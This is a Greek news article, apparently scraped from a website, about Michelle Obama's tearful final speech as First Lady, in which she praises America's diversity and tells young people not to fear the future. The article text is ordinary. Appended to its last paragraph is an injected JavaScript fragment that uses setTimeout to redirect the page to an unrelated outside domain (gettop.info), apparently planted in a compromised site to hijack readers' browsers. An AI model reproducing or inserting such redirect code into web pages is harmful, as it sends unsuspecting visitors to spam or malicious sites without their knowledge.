Συγκίνηση για τη Μισέλ στην τελευταία της ομιλία

0
8

 

«Προς όλους τους νέους που ακούνε, να γνωρίζετε ότι αυτή η χώρα σας ανήκει, σε όλους εσάς, όποια κι αν είναι η καταγωγή της ή η διαδρομή σας» είπε με δάκρυα στα μάτια φανερά συγκινημένη η σύζυγος του απερχόμενου προέδρου Μπαράκ Ομπάμα, Μισέλ, κατά την διάρκεια της τελευταίας ομιλίας που εκφώνησε από τον Λευκό Οίκο.

Mε την φωνή της να σπάει από την συγκίνηση, η απερχόμενη «πρώτη κυρία» των ΗΠΑ Μισέλ Ομπάμα έπλεξε το εγκώμιο της «θαυμάσιας διαφορετικότητας» της Αμερικής, προτρέποντας παράλληλα τη νεολαία να μην φοβάται το μέλλον.

«Εάν εσείς ή οι γονείς σας είστε μετανάστες, να γνωρίζετε ότι είστε μέρος μιας παράδοσης για την οποία η Αμερική είναι υπερήφανη (…). Να γνωρίζετε επίσης ότι η θρησκευτική διαφορετικότητα αποτελεί επίσης μια μεγάλη αμερικανική παράδοση» συμπλήρωσε η Μισέλ Ομπάμα, χωρίς να αναφέρει ούτε μία φορά το όνομα του μεγιστάνα.

«Η θαυμάσια διαφορετικότητά μας μάς έκανε αυτό που είμαστε» τόνισε η ίδια με σπασμένη από τη συγκίνηση φωνή. «Με ακούτε; Μην φοβάστε, να είστε αποφασισμένοι, να δίνεστε ολοκληρωτικά» συνέχισε η Μισέλ Ομπάμα, απευθύνοντας έκκληση τίποτα να μην θεωρείται δεδομένο: «Πρέπει να παραμείνετε προσηλωμένοι στον ρόλο σας και να προστατεύετε αυτές τις ελευθερίες». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here